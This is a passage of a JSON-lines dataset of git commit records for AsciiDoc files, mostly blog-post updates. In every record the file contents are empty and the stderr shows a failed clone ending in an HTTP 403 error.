1.6\n","repos":"webkaz\/groovy-website,marcoVermeulen\/groovy-website,sdkman\/sdkman-website,marc0der\/groovy-website,kevintanhongann\/groovy-website,dmesu\/sdkman-website,PascalSchumacher\/groovy-website,rahulsom\/sdkman-website,kevintanhongann\/groovy-website,webkaz\/groovy-website,m-ullrich\/groovy-website,dmesu\/sdkman-website,groovy\/groovy-website,benignbala\/groovy-website,marc0der\/groovy-website,sdkman\/sdkman-website,rahulsom\/sdkman-website,groovy\/groovy-website,marcoVermeulen\/groovy-website,benignbala\/groovy-website","old_file":"site\/src\/site\/releasenotes\/groovy-1.6.adoc","new_file":"site\/src\/site\/releasenotes\/groovy-1.6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dmesu\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9a527b77607a9c58f664be7d74bb0ca95d6a4e97","subject":"Update 2016-07-12-Mudar-o-endereco-do-site-no-Word-Press.adoc","message":"Update 2016-07-12-Mudar-o-endereco-do-site-no-Word-Press.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2016-07-12-Mudar-o-endereco-do-site-no-Word-Press.adoc","new_file":"_posts\/2016-07-12-Mudar-o-endereco-do-site-no-Word-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8020e16c0d3373b51d776d9d5bb67cf6cd1c3a16","subject":"Update 2017-09-17-Acemice-Belki-Hadsizce-5.adoc","message":"Update 2017-09-17-Acemice-Belki-Hadsizce-5.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-09-17-Acemice-Belki-Hadsizce-5.adoc","new_file":"_posts\/2017-09-17-Acemice-Belki-Hadsizce-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcb08fcd92095f540b2df3b82e78660932d3a556","subject":"[docs] Add troubleshooting for KuduStorageHandler","message":"[docs] Add troubleshooting for KuduStorageHandler\n\nChange-Id: I80e028a6f827269d97f26ec7a2cf4b8c22d2a838\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6738\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert 
<4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fdce442aece7658937039872a7f712cd75fd1370","subject":"changing the install link to CE page","message":"changing the install link to CE page\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a47ca2ec65bc5ce1b91e56b1990f254c28abe083","subject":"Update 2015-06-22-Documenter.adoc","message":"Update 2015-06-22-Documenter.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-22-Documenter.adoc","new_file":"_posts\/2015-06-22-Documenter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8adf2b9a2d2365cd5b6f44c3cb798e6494b578f","subject":"y2b create post iPad 2 Size Comparison \\u0026 Camera Test In HD","message":"y2b create post iPad 2 Size Comparison \\u0026 Camera Test In HD","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-11-iPad-2-Size-Comparison-u0026-Camera-Test-In-HD.adoc","new_file":"_posts\/2011-03-11-iPad-2-Size-Comparison-u0026-Camera-Test-In-HD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4123455a8e85a03281c82601223996900325e0c5","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40567aa22e3bc19246fd4befbf342791fb351b15","subject":"Added some deployment recipes","message":"Added some deployment recipes\n","repos":"korczis\/gooddata-ruby-examples,korczis\/gooddata-ruby-examples","old_file":"07_delpoyment_recipes\/disabling_schedules.asciidoc","new_file":"07_delpoyment_recipes\/disabling_schedules.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/korczis\/gooddata-ruby-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2443a09c9751892a8bde0f6e925f59c62e00d737","subject":"Update 2094-1-1-Puzzle-7-C-U-B-E-S.adoc","message":"Update 2094-1-1-Puzzle-7-C-U-B-E-S.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2094-1-1-Puzzle-7-C-U-B-E-S.adoc","new_file":"_posts\/2094-1-1-Puzzle-7-C-U-B-E-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30b33bd916b2473717023398f0400a9fde5b4965","subject":"Update 2015-02-21-Writing-Hello-World-N-Times.adoc","message":"Update 2015-02-21-Writing-Hello-World-N-Times.adoc","repos":"hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io","old_file":"_posts\/2015-02-21-Writing-Hello-World-N-Times.adoc","new_file":"_posts\/2015-02-21-Writing-Hello-World-N-Times.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hhimanshu\/hhimanshu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a7769a0b60123d7318ff35a098035afe6eae267","subject":"Update 2016-04-16-google-analytics-with-google-app-script.adoc","message":"Update 2016-04-16-google-analytics-with-google-app-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-app-script.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-app-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2436e96bc8dacdd945dd50c8d307fc77c5de1ea","subject":"y2b create post This Technology Turns Alcohol To Vapor","message":"y2b create post This Technology Turns Alcohol To Vapor","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-27-This-Technology-Turns-Alcohol-To-Vapor.adoc","new_file":"_posts\/2017-02-27-This-Technology-Turns-Alcohol-To-Vapor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"552d14cdbe9fff82749a67541236ec307305ffc7","subject":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","message":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9ba4b41d2d1dfbd752383f9dea4e510e5c23a81","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27a904418032b4c6d4706bf81e3f2f63149fa016","subject":"Update 2016-06-10-Amazon-Machine-Learning.adoc","message":"Update 2016-06-10-Amazon-Machine-Learning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-Amazon-Machine-Learning.adoc","new_file":"_posts\/2016-06-10-Amazon-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f79e883d764a38efaf007b3fc50afad3113cf07","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ba8f07f07b3694e1cd46220e80874895413fcdf","subject":"Renamed '_posts\/2018-02-25-3-Cool-Gadgets-Under-$80.adoc' to '_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc'","message":"Renamed '_posts\/2018-02-25-3-Cool-Gadgets-Under-$80.adoc' to '_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc","new_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"e1ae865b90498c876eb5f9412e085f267102668f","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41b41c4594e734c20254a48b394039643f3e0c8c","subject":"Update 2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","message":"Update 2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","new_file":"_posts\/2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0af4004c193670ec157882f140fe7ae0af1c9fac","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/brave_new_post.adoc","new_file":"content\/writings\/brave_new_post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"11d74372c910ef596693553a7042d6545e3c416c","subject":"Update 2015-08-06-Docker-Compose-the-only-requirement-for-your-app.adoc","message":"Update 2015-08-06-Docker-Compose-the-only-requirement-for-your-app.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Docker-Compose-the-only-requirement-for-your-app.adoc","new_file":"_posts\/2015-08-06-Docker-Compose-the-only-requirement-for-your-app.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3aab57a7a0cf8701099ab5bcf2ab3c9dddfb3216","subject":"Small typo in `README.adoc`","message":"Small typo in `README.adoc`\n\n`air gap` > `air-gapped`.\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb5562c98a23398b9d2cce96435e769e6c7fda40","subject":"[doc] Move the toc after the introduction","message":"[doc] Move the toc after the introduction\n","repos":"netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netceler\/pipeline-maven-plugin.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7a0273b964ec33d685612da68fde6cfe45b1e3f","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9105be707872901ad2da5a6278b8c3a6de1369e6","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68143f2be6b9d649b18221408bb1136c50ee7d0a","subject":"Update 06-04-2017-Test-1.adoc","message":"Update 06-04-2017-Test-1.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/06-04-2017-Test-1.adoc","new_file":"_posts\/06-04-2017-Test-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1900c6b3eb0eebe22c607c5f6e811f8feed62f52","subject":"Update 2016-01-12-Groovy.adoc","message":"Update 2016-01-12-Groovy.adoc","repos":"fabself\/fabself.github.io,fabself\/fabself.github.io,fabself\/fabself.github.io","old_file":"_posts\/2016-01-12-Groovy.adoc","new_file":"_posts\/2016-01-12-Groovy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fabself\/fabself.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"097bec685adb88d504712bb6357b5abea5a49970","subject":"Update 2018-02-02-Go-O-R.adoc","message":"Update 2018-02-02-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-Go-O-R.adoc","new_file":"_posts\/2018-02-02-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c97dafaabb839ab6c21efaca593e1b213b0c90fe","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 
2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7f5062b657a5ec590899e0db15fb0eff02176bf","subject":"Create test.adoc","message":"Create test.adoc","repos":"griffio\/griffio.github.io,griffio\/griffio.github.io,griffio\/griffio.github.io","old_file":"test.adoc","new_file":"test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/griffio\/griffio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cb7bce311b0d03cf97a48a98a9a1af168a4100d","subject":"y2b create post Nexus 6P vs Nexus 5X","message":"y2b create post Nexus 6P vs Nexus 5X","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-29-Nexus-6P-vs-Nexus-5X.adoc","new_file":"_posts\/2015-10-29-Nexus-6P-vs-Nexus-5X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c53309a68a6aed33b613a3417f8947ffbc2f0434","subject":"Update 2016-04-05-Local-File-Inclusion.adoc","message":"Update 2016-04-05-Local-File-Inclusion.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"791fdb8b5d1e1a85fbe88cb37c43764f8659a547","subject":"Update 2017-09-26-zapier-Google-Trello.adoc","message":"Update 2017-09-26-zapier-Google-Trello.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e118de97284df07f57a5f32babf04f3d5b116716","subject":"Update 2018-07-19-P-H-P-Under-the-Hood.adoc","message":"Update 2018-07-19-P-H-P-Under-the-Hood.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-19-P-H-P-Under-the-Hood.adoc","new_file":"_posts\/2018-07-19-P-H-P-Under-the-Hood.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c47e758c5e0da1551a5ebf50eab9ba18bfa366ab","subject":"TCOMP-992 how to contribute to documentation","message":"TCOMP-992 how to contribute to documentation","repos":"chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime","old_file":"documentation\/readme.adoc","new_file":"documentation\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chmyga\/component-runtime.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fde6fd59653f292aaed91d8294cfe88158c80f7f","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25341b3cd1fce4cd642d3aa64eebf27407177f67","subject":"add missing doc","message":"add missing doc\n","repos":"puneetjaiswal\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,nfouka\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,holdenk\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,Gavin-Yang\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/intro\/changes-13m2.adoc","new_file":"docs\/src\/reference\/asciidoc\/intro\/changes-13m2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pranavraman\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a89bfe84baadb691664e4cbcc5378b674a01b46e","subject":"[DOCS] Split long lines in Docker TLS getting-started snippet","message":"[DOCS] Split long lines in Docker TLS getting-started snippet\n\nand add warning for Windows users not using\r\nPowerShell (e.g. 
`cmd.exe`) to remove the `\\` character and join\r\nlines.\r\n\r\nAlso fix trailing whitespace character in link back to `docker.asciidoc`.\r\n\r\nRelates elastic\/x-pack-elasticsearch#2999\n\nOriginal commit: elastic\/x-pack-elasticsearch@fe1c5dbc11f6bf8e8f920a452ae5e02dd859a8fa\n","repos":"scorpionvicky\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/en\/security\/securing-communications\/configuring-tls-docker.asciidoc","new_file":"docs\/en\/security\/securing-communications\/configuring-tls-docker.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17cb77d2b8316ffd6f18bc33a44c4b4e1247b126","subject":"ajout de l'article sur Gradle et Kotlin","message":"ajout de l'article sur Gradle et Kotlin\n","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2016-07-13-gradle-embrasse-kotlin.adoc","new_file":"_posts\/2016-07-13-gradle-embrasse-kotlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"292f8fdf15aebfdc179f825f40bd273aad0db0a0","subject":"Update 2017-10-12-start-chrome-extension.adoc","message":"Update 2017-10-12-start-chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-12-start-chrome-extension.adoc","new_file":"_posts\/2017-10-12-start-chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 